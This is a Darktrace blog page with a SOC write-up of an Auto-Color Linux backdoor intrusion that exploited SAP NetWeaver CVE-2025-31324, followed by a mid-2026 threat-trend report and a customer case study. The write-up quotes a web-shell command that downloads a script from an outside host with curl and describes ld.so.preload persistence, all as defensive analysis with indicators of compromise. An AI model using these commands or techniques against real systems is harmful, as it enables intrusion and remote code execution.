Blog
/
Network
/
July 29, 2025

Auto-Color Backdoor: How Darktrace Thwarted a Stealthy Linux Intrusion

This blog examines a real-world Auto-Color malware attack that originated from the exploitation of CVE-2025-31324. Learn how Darktrace identified and contained the threat using AI-driven detection and response, with additional support from its expert analyst team.
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Owen Finn
Cyber Analyst
Default blog image
29
Jul 2025

In April 2025, Darktrace identified an Auto-Color backdoor malware attack taking place on the network of a US-based chemicals company.

Over the course of three days, a threat actor gained access to the customer’s network, attempted to download several suspicious files and communicated with malicious infrastructure linked to Auto-Color malware.

After Darktrace successfully blocked the malicious activity and contained the attack, the Darktrace Threat Research team conducted a deeper investigation into the malware.

They discovered that the threat actor had exploited CVE-2025-31324 to deploy Auto-Color as part of a multi-stage attack — the first observed pairing of SAP NetWeaver exploitation with the Auto-Color malware.

Furthermore, Darktrace’s investigation revealed that Auto-Color is now employing suppression tactics to cover its tracks and evade detection when it is unable to complete its kill chain.

What is CVE-2025-31324?

On April 24, 2025, the software provider SAP SE disclosed a critical vulnerability in its SAP Netweaver product, namely CVE-2025-31324. The exploitation of this vulnerability would enable malicious actors to upload files to the SAP Netweaver application server, potentially leading to remote code execution and full system compromise. Despite the urgent disclosure of this CVE, the vulnerability has been exploited on several systems [1]. More information on CVE-2025-31324 can be found in our previous discussion.

What is Auto-Color Backdoor Malware?

The Auto-Color backdoor malware, named after its ability to rename itself to “/var/log/cross/auto-color” after execution, was first observed in the wild in November 2024 and is categorized as a Remote Access Trojan (RAT).

Auto-Colour has primarily been observed targeting universities and government institutions in the US and Asia [2].

What does Auto-Color Backdoor Malware do?

It is known to target Linux systems by exploiting built-in system features like ld.so.preload, making it highly evasive and dangerous, specifically aiming for persistent system compromise through shared object injection.

Each instance uses a unique file and hash, due to its statically compiled and encrypted command-and-control (C2) configuration, which embeds data at creation rather than retrieving it dynamically at runtime. The behavior of the malware varies based on the privilege level of the user executing it and the system configuration it encounters.

How does Auto-Color work?

The malware’s process begins with a privilege check; if the malware is executed without root privileges, it skips the library implant phase and continues with limited functionality, avoiding actions that require system-level access, such as library installation and preload configuration, opting instead to maintain minimal activity while continuing to attempt C2 communication. This demonstrates adaptive behavior and an effort to reduce detection when running in restricted environments.

If run as root, the malware performs a more invasive installation, installing a malicious shared object, namely **libcext.so.2**, masquerading as a legitimate C utility library, a tactic used to blend in with trusted system components. It uses dynamic linker functions like dladdr() to locate the base system library path; if this fails, it defaults to /lib.

Gaining persistence through preload manipulation

To ensure persistence, Auto-Color modifies or creates /etc/ld.so.preload, inserting a reference to the malicious library. This is a powerful Linux persistence technique as libraries listed in this file are loaded before any others when running dynamically linked executables, meaning Auto-Color gains the ability to silently hook and override standard system functions across nearly all applications.

Once complete, the ELF binary copies and renames itself to “**/var/log/cross/auto-color**”, placing the implant in a hidden directory that resembles system logs. It then writes the malicious shared object to the base library path.

A delayed payload activated by outbound communication

To complete its chain, Auto-Color attempts to establish an outbound TLS connection to a hardcoded IP over port 443. This enables the malware to receive commands or payloads from its operator via API requests [2].

Interestingly, Darktrace found that Auto-Color suppresses most of its malicious behavior if this connection fails - an evasion tactic commonly employed by advanced threat actors. This ensures that in air-gapped or sandboxed environments, security analysts may be unable to observe or analyze the malware’s full capabilities.

If the C2 server is unreachable, Auto-Color effectively stalls and refrains from deploying its full malicious functionality, appearing benign to analysts. This behavior prevents reverse engineering efforts from uncovering its payloads, credential harvesting mechanisms, or persistence techniques.

In real-world environments, this means the most dangerous components of the malware only activate when the attacker is ready, remaining dormant during analysis or detonation, and thereby evading detection.

Darktrace’s coverage of the Auto-Color malware

Initial alert to Darktrace’s SOC

On April 28, 2025, Darktrace’s Security Operations Centre (SOC) received an alert for a suspicious ELF file downloaded on an internet-facing device likely running SAP Netweaver. ELF files are executable files specific to Linux, and in this case, the unexpected download of one strongly indicated a compromise, marking the delivery of the Auto-Color malware.

Figure 1: A timeline breaking down the stages of the attack

Early signs of unusual activity detected by Darktrace

While the first signs of unusual activity were detected on April 25, with several incoming connections using URIs containing /developmentserver/metadatauploader, potentially scanning for the CVE-2025-31324 vulnerability, active exploitation did not begin until two days later.

Initial compromise via ZIP file download followed by DNS tunnelling requests

In the early hours of April 27, Darktrace detected an incoming connection from the malicious IP address 91.193.19[.]109[.] 6.

The telltale sign of CVE-2025-31324 exploitation was the presence of the URI ‘/developmentserver/metadatauploader?CONTENTTYPE=MODEL&CLIENT=1’, combined with a ZIP file download.

The device immediately made a DNS request for the Out-of-Band Application Security Testing (OAST) domain aaaaaaaaaaaa[.]d06oojugfd4n58p4tj201hmy54tnq4rak[.]oast[.]me.

OAST is commonly used by threat actors to test for exploitable vulnerabilities, but it can also be leveraged to tunnel data out of a network via DNS requests.

Darktrace’s Autonomous Response capability quickly intervened, enforcing a “pattern of life” on the offending device for 30 minutes. This ensured the device could not deviate from its expected behavior or connections, while still allowing it to carry out normal business operations.

Figure 2: Alerts from the device’s Model Alert Log showing possible DNS tunnelling requests to ‘request bin’ services.
Figure 3: Darktrace’s Autonomous Response enforcing a “pattern of life” on the compromised device following a suspicious tunnelling connection.

Continued malicious activity

The device continued to receive incoming connections with URIs containing ‘/developmentserver/metadatauploader’. In total seven files were downloaded (see filenames in Appendix).

Around 10 hours later, the device made a DNS request for ‘ocr-freespace.oss-cn-beijing.aliyuncs[.]com’.

In the same second, it also received a connection from 23.186.200[.]173 with the URI ‘/irj/helper.jsp?cmd=curl -O hxxps://ocr-freespace.oss-cn-beijing.aliyuncs[.]com/2025/config.sh’, which downloaded a shell script named config.sh.

Execution

This script was executed via the helper.jsp file, which had been downloaded during the initial exploit, a technique also observed in similar SAP Netweaver exploits [4].

Darktrace subsequently observed the device making DNS and SSL connections to the same endpoint, with another inbound connection from 23.186.200[.]173 and the same URI observed again just ten minutes later.

The device then went on to make several connections to 47.97.42[.]177 over port 3232, an endpoint associated with Supershell, a C2 platform linked to backdoors and commonly deployed by China-affiliated threat groups [5].

Less than 12 hours later, and just 24 hours after the initial exploit, the attacker downloaded an ELF file from http://146.70.41.178:4444/logs, which marked the delivery of the Auto-Color malware.

Figure 4: Darktrace’s detection of unusual outbound connections and the subsequent file download from http://146.70.41.178:4444/logs, as identified by Cyber AI Analyst.

A deeper investigation into the attack

Darktrace’s findings indicate that CVE-2025-31324 was leveraged in this instance to launch a second-stage attack, involving the compromise of the internet-facing device and the download of an ELF file representing the Auto-Color malware—an approach that has also been observed in other cases of SAP NetWeaver exploitation [4].

Darktrace identified the activity as highly suspicious, triggering multiple alerts that prompted triage and further investigation by the SOC as part of the Darktrace Managed Detection and Response (MDR) service.

During this investigation, Darktrace analysts opted to extend all previously applied Autonomous Response actions for an additional 24 hours, providing the customer’s security team time to investigate and remediate.

Figure 5: Cyber AI Analyst’s investigation into the unusual connection attempts from the device to the C2 endpoint.

At the host level, the malware began by assessing its privilege level; in this case, it likely detected root access and proceeded without restraint. Following this, the malware began the chain of events to establish and maintain persistence on the device, ultimately culminating an outbound connection attempt to its hardcoded C2 server.

Figure 6: Cyber AI Analyst’s investigation into the unusual connection attempts from the device to the C2 endpoint.

Over a six-hour period, Darktrace detected numerous attempted connections to the endpoint 146.70.41[.]178 over port 443. In response, Darktrace’s Autonomous Response swiftly intervened to block these malicious connections.

Given that Auto-Color relies heavily on C2 connectivity to complete its execution and uses shared object preloading to hijack core functions without modifying existing binaries, the absence of a successful connection to its C2 infrastructure (in this case, 146.70.41[.]178) causes the malware to sleep before trying to reconnect.

While Darktrace’s analysis was limited by the absence of a live C2, prior research into its command structure reveals that Auto-Color supports a modular C2 protocol. This includes reverse shell initiation (0x100), file creation and execution tasks (0x2xx), system proxy configuration (0x300), and global payload manipulation (0x4XX). Additionally, core command IDs such as 0,1, 2, 4, and 0xF cover basic system profiling and even include a kill switch that can trigger self-removal of the malware [2]. This layered command set reinforces the malware’s flexibility and its dependence on live operator control.

Thanks to the timely intervention of Darktrace’s SOC team, who extended the Autonomous Response actions as part of the MDR service, the malicious connections remained blocked. This proactive prevented the malware from escalating, buying the customer’s security team valuable time to address the threat.

Conclusion

Ultimately, this incident highlights the critical importance of addressing high-severity vulnerabilities, as they can rapidly lead to more persistent and damaging threats within an organization’s network. Vulnerabilities like CVE-2025-31324 continue to be exploited by threat actors to gain access to and compromise internet-facing systems. In this instance, the download of Auto-Color malware was just one of many potential malicious actions the threat actor could have initiated.

From initial intrusion to the failed establishment of C2 communication, the Auto-Color malware showed a clear understanding of Linux internals and demonstrated calculated restraint designed to minimize exposure and reduce the risk of detection. However, Darktrace’s ability to detect this anomalous activity, and to respond both autonomously and through its MDR offering, ensured that the threat was contained. This rapid response gave the customer’s internal security team the time needed to investigate and remediate, ultimately preventing the attack from escalating further.

Credit to Harriet Rayner (Cyber Analyst), Owen Finn (Cyber Analyst), Tara Gould (Threat Research Lead) and Ryan Traill (Analyst Content Lead)

Appendices

MITRE ATT&CK Mapping

Malware - RESOURCE DEVELOPMENT - T1588.001

Drive-by Compromise - INITIAL ACCESS - T1189

Data Obfuscation - COMMAND AND CONTROL - T1001

Non-Standard Port - COMMAND AND CONTROL - T1571

Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol - EXFILTRATION - T1048.003

Masquerading - DEFENSE EVASION - T1036

Application Layer Protocol - COMMAND AND CONTROL - T1071

Unix Shell – EXECUTION - T1059.004

LC_LOAD_DYLIB Addition – PERSISTANCE - T1546.006

Match Legitimate Resource Name or Location – DEFENSE EVASION - T1036.005

Web Protocols – COMMAND AND CONTROL - T1071.001

Indicators of Compromise (IoCs)

Filenames downloaded:

  • exploit.properties
  • helper.jsp
  • 0KIF8.jsp
  • cmd.jsp
  • test.txt
  • uid.jsp
  • vregrewfsf.jsp

Auto-Color sample:

  • 270fc72074c697ba5921f7b61a6128b968ca6ccbf8906645e796cfc3072d4c43 (sha256)

IP Addresses

  • 146[.]70[.]19[.]122
  • 149[.]78[.]184[.]215
  • 196[.]251[.]85[.]31
  • 120[.]231[.]21[.]8
  • 148[.]135[.]80[.]109
  • 45[.]32[.]126[.]94
  • 110[.]42[.]42[.]64
  • 119[.]187[.]23[.]132
  • 18[.]166[.]61[.]47
  • 183[.]2[.]62[.]199
  • 188[.]166[.]87[.]88
  • 31[.]222[.]254[.]27
  • 91[.]193[.]19[.]109
  • 123[.]146[.]1[.]140
  • 139[.]59[.]143[.]102
  • 155[.]94[.]199[.]59
  • 165[.]227[.]173[.]41
  • 193[.]149[.]129[.]31
  • 202[.]189[.]7[.]77
  • 209[.]38[.]208[.]202
  • 31[.]222[.]254[.]45
  • 58[.]19[.]11[.]97
  • 64[.]227[.]32[.]66

Darktrace Model Detections

Compromise / Possible Tunnelling to Bin Services

Anomalous Server Activity / New User Agent from Internet Facing System

Anomalous File / Incoming ELF File

Anomalous Connection / Application Protocol on Uncommon Port

Anomalous Connection / New User Agent to IP Without Hostname

Experimental / Mismatched MIME Type From Rare Endpoint V4

Compromise / High Volume of Connections with Beacon Score

Device / Initial Attack Chain Activity

Device / Internet Facing Device with High Priority Alert

Compromise / Large Number of Suspicious Failed Connections

Model Alerts for CVE

Compromise / Possible Tunnelling to Bin Services

Compromise / High Priority Tunnelling to Bin Services

Autonomous Response Model Alerts

Antigena / Network::External Threat::Antigena Suspicious File Block

Antigena / Network::External Threat::Antigena File then New Outbound Block

Antigena / Network::Significant Anomaly::Antigena Controlled and Model Alert

Experimental / Antigena File then New Outbound Block

Antigena / Network::External Threat::Antigena Suspicious Activity Block

Antigena / Network::Significant Anomaly::Antigena Alerts Over Time Block

Antigena / Network::Significant Anomaly::Antigena Enhanced Monitoring from Client Block

Antigena / Network::Significant Anomaly::Antigena Enhanced Monitoring from Client Block

Antigena / Network::Significant Anomaly::Antigena Alerts Over Time Block

Antigena / MDR::Model Alert on MDR-Actioned Device

Antigena / Network::Significant Anomaly::Antigena Enhanced Monitoring from Client Block

References

1. [Online] https://onapsis.com/blog/active-exploitation-of-sap-vulnerability-cve-2025-31324/.

2. https://unit42.paloaltonetworks.com/new-linux-backdoor-auto-color/. [Online]

3. [Online] (https://www.darktrace.com/blog/tracking-cve-2025-31324-darktraces-detection-of-sap-netweaver-exploitation-before-and-after-disclosure#:~:text=June%2016%2C%202025-,Tracking%20CVE%2D2025%2D31324%3A%20Darktrace's%20detection%20of%20SAP%20Netweaver,guidance%.

4. [Online] https://unit42.paloaltonetworks.com/threat-brief-sap-netweaver-cve-2025-31324/.

5. [Online] https://www.forescout.com/blog/threat-analysis-sap-vulnerability-exploited-in-the-wild-by-chinese-threat-actor/.

Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Owen Finn
Cyber Analyst

More in this series

No items found.

Blog

/

/

August 3, 2026

Why Trust is the New Attack Surface: Darktrace’s Mid-Year Threat Update 2026

Default blog imageDefault blog image

In early 2026, a React2Shell honeypot purpose-built by Darktrace analysts was compromised in less than two hours after deployment. That single data point captures the pace of the threat landscape in the first half of 2026, but speed tells only part of the story.

The shift over the past six months has moved away from traditional malware and vulnerability-centric attacks and toward the abuse of trusted identities, platforms, and infrastructure. Identities, Software-as-a-Service (SaaS) platforms, cloud entitlements, automation frameworks, and non-human identities have become the preferred attack paths as organizations adopt AI at scale.

Attackers are increasingly operating inside the relationships, services, and authenticated channels that defenders and users are conditioned to rely on, rather than breaking in from the outside.

What has changed since 2025?

In 2025, identity became the new perimeter as attackers increasingly bypassed traditional exploitation in favor of trusted accounts, SaaS platforms, and emerging AI-enabled tradecraft. The first half of 2026 marks the next stage of that evolution. Identity remains central, but the trust challenge now extends far beyond accounts to email authentication, cloud entitlements, software supply chains, AI gateways, remote administration tooling, and non-human identities.

Theme 2025 (Mid-Year / Annual) H1 2026
Identity Credentials remained the weak link; identity emerged as the new perimeter. Identity remains the entry point, but trust has become the new attack surface.
Cloud & SaaS SaaS-targeted ransomware continued to rise. Cloud and SaaS became the attacker's preferred operating environment.
AI Large Language Models (LLMs) were suspected of influencing phishing shifts. LLM-generated malware, compromised AI proxies, and the abuse of AI identities emerged.
Attack Surface Scale & Speed Exponential growth of Common Vulnerabilities and Exposures (CVEs), with public proof-of-concepts appearing faster. Cloud and AI adoption expanded the attack surface, while AI accelerated exploitation. One honeypot was compromised in under two hours.
Supply Chain Legitimate services were increasingly abused. Trusted maintainers and CI/CD workflows were weaponized.

Identity and email: trust signals under pressure

Email remains the most reliable route to a trusted identity, and the data shows attackers investing in quality over noise. In the first half of 2026, 67% of phishing emails passed DMARC. Authentication alone is no longer sufficient to stop most phishing attempts. VIP users were targeted in 25.8% of phishing, consistent with 2025's “over 25%” figure, but drifting upward throughout the period. Crucially, phishing sophistication continued to increase: 37% of phishing contained a high volume of text, up from 32% in the first half of 2025, while 39% featured novel social engineering techniques, suggesting attackers are further customizing to specific targets.

The most prevalent threats affecting Darktrace customers were also among the most identity-centric: information stealers, with dedicated StealC and AMOS campaigns running through the half-year. Their prevalence is, fundamentally, an identity story. Credentials harvested by infostealers often become the initial access vector for far higher-impact intrusions later in the attack chain. Crucially, the delivery method rarely requires exploitation of a technical weakness. ClickFix social engineering, which tricks users into running malicious code themselves, remained a common distribution route. One recent campaign impacted Darktrace customers across 17 countries, with the United States the most affected. The compromise did not begin with a software flaw, but with a trusted user taking a trusted action.

Supply chain: Trust weaponized at scale

March and April reinforced the same lesson: trust has become a supply-chain vulnerability. The Axios compromise abused trust in a widely used maintainer, while the Trivy campaign leveraged trusted CI/CD infrastructure, release artifacts, and container images to push malicious code through legitimate development workflows.

The clearest example was a February–March campaign in which devices downloaded malicious payloads while using Hola VPN, later linked to an issue within Hola's own delivery pipeline. Darktrace's Threat Research team identified associated activity through recurring anomalous behavior across multiple customers before a public advisory was released.

More recently, attackers abused legitimate blockchain infrastructure to distribute infostealers, including AMOS and Phexia. Popular tools like VPNs, often used by users with limited security resources, combined with legitimate command-and-control (C2) infrastructure enables attackers to reach a far wider victim base while frustrating defenders who cannot simply block the associated endpoints.

For defenders, the challenge is no longer identifying malicious infrastructure, but recognizing when trusted infrastructure begins behaving maliciously.

Cloud and SaaS: from target to terrain

Through May and June, activity involving device registration, cloud data theft, SaaS abuse, RDP expansion, and remote management tooling suggested that attackers increasingly view cloud and SaaS not simply as targets, but as their preferred operating environment.

In one Darktrace case a single compromised SaaS account triggered activity across email, SaaS, and network layers, including inbox rule changes, phishing propagation, and connections to suspicious infrastructure. None of these indicators were decisive in isolation, but together they revealed a clear intrusion. Increasingly, attackers do not need to bypass trust controls in these environments; they inherit them through compromised identities, delegated access, and legitimate administration tools. This is the natural progression of 2025's SaaS-targeted ransomware trend: the platforms on which businesses operate are increasingly the same platforms on which adversaries operate.

AI: accelerant, attack surface, and trusted but risky actor

If trust is the attack surface, AI is where that surface is expanding fastest. Across the Darktrace customer base, AI service connections per deployment rose 13% in the first half of 2026, surpassing 16 million connections, while the typical organization now interacts with seven different AI providers. AI is no longer at the edge of the enterprise; it is embedded in day-to-day business operations. That shift creates three distinct problems, all of which were observed by Darktrace in the first half of 2026.

1. AI as an attack multiplier

Darktrace identified AI-generated malware exploiting React2Shell, in which an attacker used an LLM to produce working exploit code and deploy it at scale. Similar activity is increasingly appearing across the wider threat landscape, suggesting that the barrier to effective offensive operations is collapsing. As demonstrated by the recent JadePuffer case, in which an agentic threat actor exploited a vulnerability in an internet-facing server before launching a fully automated ransomware attack, AI is accelerating the path from vulnerability disclosure to operational exploitation [1].

2. AI as an attack surface

The AI layer itself is now worth probing. At an automation technology manufacturer, a compromised LLM proxy was used as a steppingstone toward additional AI services; when that failed, the attacker pivoted to cryptomining. Darktrace’s Cyber AI Analyst pieced the intrusion together and Darktrace’s Managed Threat Detection service alerted the customer, containing it before it could progress further. The practitioner lesson is clear: treat AI gateways, proxies, and model endpoints as production cloud workloads because attackers already do.

3. AI as a trusted but potentially risky actor

Darktrace / SECURE AI observations suggest the most common real-world risk is quieter still: employees entering personal identifiable information (PII), tax records, identity documents, company financial data, HR records, and personal medical data into LLM prompts, alongside widespread shadow AI use and increased AI usage from mobile devices. Across nearly 280,000 prompts submitted by almost 28,000 users over 28 days, Darktrace identified that approximately 1% of these prompts (or 2,945 instances) contained sensitive data*.

*Prompt data was analyzed in aggregate and anonymized form to protect user privacy.

For defenders, the challenge is context: knowing when legitimate business use crosses into material risk without breaking privacy or user trust. As organizations increasingly trust AI systems to access, process, and share sensitive information at machine speed, AI must be secured and monitored alongside identities, applications, and cloud infrastructure.

Speed and geopolitics: faster operations, longer-term objectives

Several investigations in the first half of the year showed how quickly attackers operationalize newly disclosed vulnerabilities, validating exploitation through Out-of-Band Application Security Testing (OAST) infrastructure and trusted cloud services before patching cycles can be completed. React2Shell was compromised in two hours, while BeyondTrust exploitation followed in less than a day. Against this backdrop, state-aligned actors continue to prioritize long-term access, intelligence collection, and pre-positioning through legitimate services, cloud infrastructure, and trusted relationships. Operations linked to China, Russia, Iran, and the Democratic People’s Republic of Korea (DPRK) shared a common characteristic: a focus on persistence and strategic positioning rather than immediate disruption.

China: Darktrace observed Chinese-nexus actors prioritizing long-term access through trusted services, dynamic-link library (DLL) sideloading, and modular intrusion chains consistent with activity documented in Crimson Echo reporting and associated with Twill Typhoon tradecraft.

Iran: Darktrace's ZionSiphon investigation highlighted Iranian-linked interest in operational technology (OT) environments, blending espionage objectives with infrastructure disruption capabilities.

Russia: Darktrace investigations, alongside wider industry reporting, highlighted Russian reliance on trusted relationships and supply-chain targeting for long-term intelligence on Ukraine related support [2].

DPRK: Darktrace observed DPRK-linked activity combining rapid vulnerability weaponization with persistent access techniques, including Axios supply-chain compromise, React2Shell exploitation and stealthy macOS intrusions

While objectives differed across actors, the tradecraft was remarkably consistent: trusted services, legitimate infrastructure, and persistent access remained more valuable than immediate disruption.

The defender shift

Across identity compromise, supply-chain attacks, SaaS abuse, AI infrastructure targeting, and state-aligned operations, attackers increasingly succeed by operating through trusted systems rather than breaking through defensive controls. Trusted users, trusted software, trusted infrastructure, and increasingly trusted AI systems all became viable attack paths.

For defenders, the challenge is no longer simply determining whether an action is allowed; it is determining whether that action makes sense in its wider context. Authentication, reputation, and provenance remain important, but they are no longer sufficient on their own. As attackers increasingly operate within trusted systems, the strongest signal is often a behavioral deviation: identifying when trusted activity no longer aligns with expected behavior.

Credit to Nathaniel Jones (SVP, Global Threat Intelligence), Emma Foulger (Global Threat Research Operations Lead), Justin Torres (Senior Cyber Analyst), Daniel Levy (Threat Hunting Data Scientist)


Edited by Ryan Traill (Content Manager)

Appendix 1: Threat Research Methodology

Darktrace’s Threat Research team conducts extensive research across customer deployments to identify active threats, pinpoint key Indicators of Compromise (IoCs), and provide relevant threat intelligence. This research leverages Darktrace’s anomaly-based detection and involves thorough analysis and contextualization by the Threat Research team. Detected threats are promptly reported to the relevant customer security teams. When a customer has Darktrace’s Autonomous Response technology enabled, these threats are swiftly mitigated to prevent escalation.

Between January 1 and June 30, 2026, Darktrace investigated a wide range of cyber threats across its customer base. Many were identified as campaign-like activities targeting multiple customers, where clusters of similar tactics, techniques, and procedures (TTPs) and IoCs were seen affecting a significant number of customers within a short timeframe.

Statistics related to email are derived from aggregated Darktrace / EMAIL data across all cloud-hosted customer deployments between January 1 and June 30, 2026. Standard data-quality filtering was applied to exclude anomalous observations prior to aggregation. Regional statistics are based on relevant subsets of this dataset.

Appendix 2: Campaigns - Regional and Sector Trends

While the above broad themes defined the threat landscape over the last six months, campaign clustering across the Darktrace customer base revealed how they manifested differently across sectors, regions, and industries.

Darktrace’s Threat Research team investigates a range of threats affecting its customer base. Through this research, campaign-like clusters of activity have been identified, in which common tactics, techniques, and procedures (TTPs), as well as infrastructure, are observed impacting a significant number of customers within a short timeframe.

Sectors and industries are classified using the Standard Industrial Classification (SIC) system to ensure consistent categorization. While the sector and regional insights in this report reflect broader global trends, they are also influenced by the distribution of Darktrace's customer base. For example, Finance, Manufacturing, and Education are strongly represented among Darktrace customers, which may result in a higher number of observed cases in these sectors. This reflects customer distribution rather than necessarily indicating elevated sector-specific risk. Similarly, regional trends may be influenced by the geographic distribution of Darktrace customers.

Analysis of campaign clusters identified by the Darktrace Threat Research team during the first half of 2026 revealed distinct regional trends.

  • Europe, Middle East & Africa (EMEA) dominated with 60% of all campaign cluster cases targeting this region.
  • The Americas (AMS) was the next most affected region, with 30% of campaign cluster cases.
  • The Asia-Pacific and Japan (APJ) region was less affected by campaign clusters, potentially indicating that threat actors placed a lower priority on the region and instead focused their efforts elsewhere.

Sector targeting also varied considerably by region:

  • In EMEA, the Information and Communication was the most affected by a significant margin, representing 25% of all cases.
  • In contrast, AMS targeting was more evenly distributed, with the Education, Public administration and defence, and Financial Insurance activities sectors all forming over 20% of AMS regional cases.
  • Across APJ, campaign activity was spread more equally, with no single sector emerging as a dominant target.

Several countries also stood out within their respective regions:

  • The United States accounted for 60% of all campaign clusters within AMS.
  • Japan represented 40% of campaign customer cases across APJ.
  • In EMEA, the United Kingdom and Zimbabwe each accounted for 23% of identified cases, both being involved in a variety of campaign types.

Inside the SOC & Threat Research 2026 Monthly Progression: From Access to Impact

Month Dominant Themes
January Voice phishing, VPS infrastructure, WebSocket C2, RMM abuse, ransomware, infostealers (StealC), and trojanized installers (7-Zip).
February Voice phishing, VPN intrusion, edge infrastructure compromise (BeyondTrust), and RMM abuse.
March Sustained supply chain compromise (Hola VPN, Axios, Trivy), malicious browser extensions, phishing, and discovery tools.
April Account creation abuse, payload delivery, VPN credential abuse, Fortinet exploitation, and botnet activity.
May PowerShell, EtherHiding, data exfiltration, VPN access, business email compromise (BEC), ClickFix, and infostealers (AMOS).
June RDP abuse, device registration, RMM usage, voice phishing, cloud data theft, botnet activity, blockchain abuse, ClickFix, and infostealers (AMOS).

Appendix 3: Bibliography

External

[1] https://www.darkreading.com/cyberattacks-data-breaches/jadepuffer-first-complete-llm-driven-ransomware-attack

[2] https://www.trendmicro.com/en_us/research/26/c/pawn-storm-targets-govt-infra.html

Darktrace Reading

1.        https://www.darktrace.com/blog/ai-llm-generated-malware-used-to-exploit-react2shell

2.        https://www.darktrace.com/blog/2025-cyber-threat-landscape-darktraces-mid-year-review

3.        https://www.darktrace.com/resources/annual-threat-report-2026

4.        https://www.darktrace.com/blog/when-trust-becomes-the-attack-surface-supply-chain-attacks-in-an-era-of-automation-and-implicit-trust

5.        https://www.darktrace.com/blog/hola-vpn-abuse-from-proxy-traffic-to-malware-and-cryptomining

6.        https://www.darktrace.com/blog/security-after-signatures-operating-in-a-world-of-pre-cve-disclosure-exploitation-collapsed-trust-boundaries-and-autonomous-systems

7.        https://www.darktrace.com/blog/when-ai-infrastructure-becomes-part-of-the-attack-surface

8.        https://www.darktrace.com/blog/cve-2026-1731-how-darktrace-sees-the-beyondtrust-exploitation-wave-unfolding

9.        https://www.darktrace.com/resource/understanding-chinese-nexus-cyber-tradecraft

10.   https://www.darktrace.com/blog/chinese-apt-campaign-targets-entities-with-updated-fdmtp-backdoor

11.  https://www.darktrace.com/blog/inside-zionsiphon-darktraces-analysis-of-ot-malware-targeting-israeli-water-systems

12.  https://www.darktrace.com/resources/the-state-of-cybersecurity-in-the-finance-sector

13.  https://www.darktrace.com/blog/from-click-to-command-behavioral-detection-of-applescript-led-macos-intrusions

14.  https://www.darktrace.com/blog/the-state-of-cybersecurity-in-the-finance-sector-six-trends-to-watch

Continue reading
About the author
Nathaniel Jones
SVP, Global Threat Intelligence

Blog

/

/

August 3, 2026

Building Operational Resilience Across Mission-Critical Marine Services

Marine cargo shipDefault blog imageDefault blog image

Mission-Critical Marine Services

This marine organization supports offshore energy production, export infrastructure, and regional logistics, delivering critical services through its diverse fleet and a regional shorebase footprint. To power rapid mobilization and 24/7 operational readiness, the organization has embraced cloud adoption and digital transformation, reshaping how crews, contractors, and shore-based teams access services.

While technology modernization has enhanced operations, it has also introduced new security complexities.

  • From perimeter to identity: As access becomes more distributed, identity has become the primary security control, elevating the risk of credential compromise and privilege misuse.
  • From confidentiality to availability and resilience: As cloud platforms increasingly underpin fleet and operational systems, cyber incidents can disrupt services and safety.
  • From isolated tools to unified visibility:  Because Information Technology (IT) and Operational Technology (OT) often intersect, and legacy systems coexist with modern cloud platforms, fragmented monitoring makes it harder to understand risk and respond decisively across domains.
“Our cybersecurity priorities expanded along with our business goals, placing availability and resilience at the forefront. The impact of a potential threat became an operational risk, which elevated cybersecurity from an IT issue to an operational safety and resilience enabler.” - Information and Communications Technology (ICT) Manager.

A Unified, AI-Driven Platform for IT and OT

To strengthen visibility, detection, and response across its highly distributed environment, the customer adopted the Darktrace ActiveAI Security Platform™ in 2022.

Darktrace’s contextual detection capability was a key driver. Unlike traditional tools that rely on known threat signatures, Darktrace’s Self-Learning AI learns “normal” behavior to identify emerging threats and correlate visibility across the customer's siloed on-premises and cloud domains.

Today, the customer relies on:

  • Darktrace / EMAIL™ to reduce phishing risk and minimize disruption from legacy mail controls and false positives
  • Darktrace / IDENTITY™ to support identity-centric security as cloud access expands across vessels and shore-based operations
  • Darktrace / NETWORK™ to strengthen oversight across the broader environment, including operational contexts where IT and OT intersect
  • Darktrace / CLOUD™ (Azure), added in 2024, to extend detection and response into Azure and support cloud transformation without treating cloud as a separate security silo
  • Darktrace / Incident Readiness & Recovery to strengthen incident readiness and recovery planning
  • Darktrace Managed Detection and Response Services to provide 24/7/365 monitoring and support

This combination supports a single operating model for the customer: security that can adapt as the environment changes while remaining practical for a lean team responsible for safeguarding both business operations and safety-critical services.

Extending cloud protection without complexity

As the customer accelerated cloud adoption, it expanded coverage in 2024 with Darktrace / CLOUD for Azure to bring cloud workloads under the same AI-driven visibility and response model – without adding operational burden. “This matters in hybrid environments because attacks rarely stay in one place,” explains the ICT Manager. “A compromised identity can trigger activity in the cloud, which can open pathways back into on-premises systems.”

In parallel, Darktrace / CLOUD’s posture management capabilities support governance and audit readiness by surfacing misconfigurations and exposure risks earlier, before they become incidents.

A Stronger, Faster, More Resilient Business

Since adopting Darktrace, the customer has strengthened cyber resilience while reducing operational burden on its small ICT team.

Darktrace continuously analyzes millions of individual events that can contribute to a wider incident. Within a single month, the solution autonomously investigated 88% of all potential threats, taking appropriate action within just 39.4 seconds on average.

Autonomous capabilities ensure threats are stopped and contained until the ICT team can investigate. In one standout instance, Darktrace autonomously blocked malicious links during a mass phishing/spam event before other controls flagged the threat. the ICT Manager later confirmed Microsoft reported the link as malicious, but Darktrace had already acted to prevent delivery and reduce exposure.

“Whether something happens during off hours, while we’re on vacation, or when our attention is focused elsewhere, we’re confident Darktrace will take control and stop a threat before it spreads,” says the ICT Manager.

Darktrace’s Self-Learning AI combines multiple AI methods and advanced techniques to improve threat detection, investigation, and response dramatically reducing alert overload and manual triage. Within a single month, the solution saved the customer's IT group 411 equivalent human investigation hours.

“For a lean team supporting a 24/7 operational footprint, this autonomous action eliminates the constant firefighting and stress, giving us the space to focus on higher-value priorities.”- Information and Communications Technology (ICT) Manager.

Protecting communications without disruption

the customer experienced friction from legacy email and network controls prior to Darktrace, which generated high false positive rates, disrupted legitimate communications, created operational drag, and added workload for ICT. With Darktrace / EMAIL learning normal email behavior and applying context-aware actions, the team reduced unnecessary interruptions while maintaining protection.

“That shift matters in marine services, where business communications directly support coordination across vessels, shore bases, clients, ports, and regulators,” says the ICT Manager. “Darktrace doesn’t just block more threats, it autonomously makes decisions that preserve operational continuity and enable my team to focus on credible threats instead of chasing volume.”

Delivering clarity and confidence

